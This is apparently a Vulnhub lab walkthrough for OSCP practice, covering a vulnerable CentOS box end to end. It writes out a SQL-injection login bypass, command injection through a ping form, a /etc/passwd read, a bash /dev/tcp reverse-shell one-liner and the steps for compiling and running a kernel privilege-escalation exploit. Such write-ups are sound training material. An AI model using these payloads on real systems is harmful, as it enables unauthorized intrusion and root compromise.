Vulnhub virtual machine; On the path to OSCP this box offered SQL-injection for login and a client side web application that was able to be manipulated to give a foothold to box. Classic enumeration of box to compile a priv-esc.
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Find target on network
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Nmap Scan
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searchsploit search
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DoS is not useful in this scenario.
Navigate to webpage
Test for SQL injection
username: admin' OR '1=1--
Successful injection! We are now face with some sort of client side PING tester.
Testing a ping for localhost
Looks like we have successful command execution on box.
Remote Code Execution
Attempt to grab the passwd file by submitting:
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we are ‘apache’.
Reverse Shell
Setup Listener on port 9000
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Attempt to setup a reverse connection with an easy one liner
/bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1
how it works:
*bash -i>&*
: invoke bash with an interactive option
: redirect the session with the /dev/tcp device file
: use the standard output and redirect it to the standard input
connection established to box and we are ‘apache’.
Upgrade Half Shell to Full Shell Test for which python
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Investigate the environment
Running CentOS release 4.5 and Linux 2.6.9-55
check searchsploit for vulnerabilties:
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Interesting hit with Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)
Mirror exploit to directory
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Investigate/search for any random shell code and replace if needed.
Get file over to target box with a SimpleHTTPServer
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Save file to memory of box as a good habit located at: /dev/shm
Compile on box:
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Change the chmod of the file chmod 755 exploit
Execute exploit
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Bring me the root!